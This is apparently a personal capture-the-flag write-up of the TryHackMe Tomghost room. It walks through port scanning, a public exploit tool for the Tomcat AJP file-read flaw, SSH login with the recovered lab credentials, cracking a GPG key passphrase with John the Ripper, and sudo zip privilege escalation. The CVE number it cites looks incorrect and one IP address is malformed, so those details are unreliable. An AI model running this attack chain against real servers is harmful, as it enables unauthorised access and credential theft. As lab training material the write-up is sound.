THM Tomghost room

THM Tomghost room
Photo by Arget / Unsplash

This room was fun and one of the easier ones once I found some tooling on GitHub. I like that they have rooms related to the CVEs that are published and give you some experience with them. Well, enough with the intro time to get to it.

The first thing that I always do is run an nmap scan. The one that I usually do first is nmap -p- IP_ADDRESS to get a scan of all the ports that are open. Once I have the list to narrow down, I then will do a more focused scan to get versions and possible scripts that could be run. That command looks like nmap -p PORTS -sC -sV -oA server IP_ADDRESS. The output is in the next section below.

Enumeration

NMAP

Nmap scan report for 10.10.69.119
Host is up (0.28s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I can see that there is a different port than usual open 8009 and it has a service of Apache Jserv running. I don't know what that is, so it's off to Google to see what we can come up with. While I am doing that I run gobuster against port 8080 to see if there are any pages of interest and the results are below.

Gobuster

/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/manager              (Status: 302) [Size: 0] [--> /manager/] 

Research

This is an Apache Tomcat server and the version that it's running (9.0.30) is related to CVE-2020-10487. I searched GitHub and came across this tool, 00theway and that seemed to give me what I needed. The following command I used to see what output I would get from the server.

python ajpShooter.py http://10.10.106104:8080 8009 /WEB-INF.xml read

I got a good response and the following credentials were found.

- Username: skyfuck
- Password: 8730281lkjlkjdqlksalks

Exploit

Time to see what we can do with the credentials that we found. Let's see if ssh will work with the username and password that were found above. And I am in luck, I am now on the box as skyfuck. As always, the next thing to do is list the contents of the directory that I am in and I see that we have a private key and an encrypted message.

The next step is to download those items to my VM. To do that I will use scp to copy using the following command:

scp skyfuck@IPADDRESS:/home/skyfuck/*

After getting the items on the VM I try to import the private key and I can't because I don't have the password.

Time to convert the key to a format that John the Ripper can read. Since I can't remember where the file is located on my machine locate gpg2john will be used to find it. Once the program is found the next thing to do is use it to convert the file. ./gpg2john private_key > hash and then john --wordlist=~/CTF/words/pass.txt key.hash.

Here is the output of what JtR tells me.

Using default input encoding: UTF-8 Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) Cost 1 (s2k-count) is 65536 for all loaded hashes Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status alexandru        (tryhackme) 1g 0:00:00:00 DONE (2022-04-23 17:10) 5.555g/s 63288p/s 63288c/s 63288C/s alexander..amaleta Use the "--show" option to display all of the cracked passwords reliably Session completed.

Now I have the key that I need to import the private key and then decrypt the encrypted message.

gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11 "tryhackme <stuxnet@tryhackme.com>" merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

I now have a different user and password to use. So, I will switch to that user and see what that user can do. I see that there is the user flag file in Merlin's home folder, so let's submit that before I forget.

Now that I am Merlin, I use the sudo -l to see what Merlin can do as a super user. I see that Merlin can run zip as a super user. With that information it's off to GTFO bins to see how that can be used to get the root.txt flag.

Using the command that is given on that website I now can elevate to the root user and then view the root.txt file and the room is complete.

As always, if you have questions or feedback about anything I say please email me.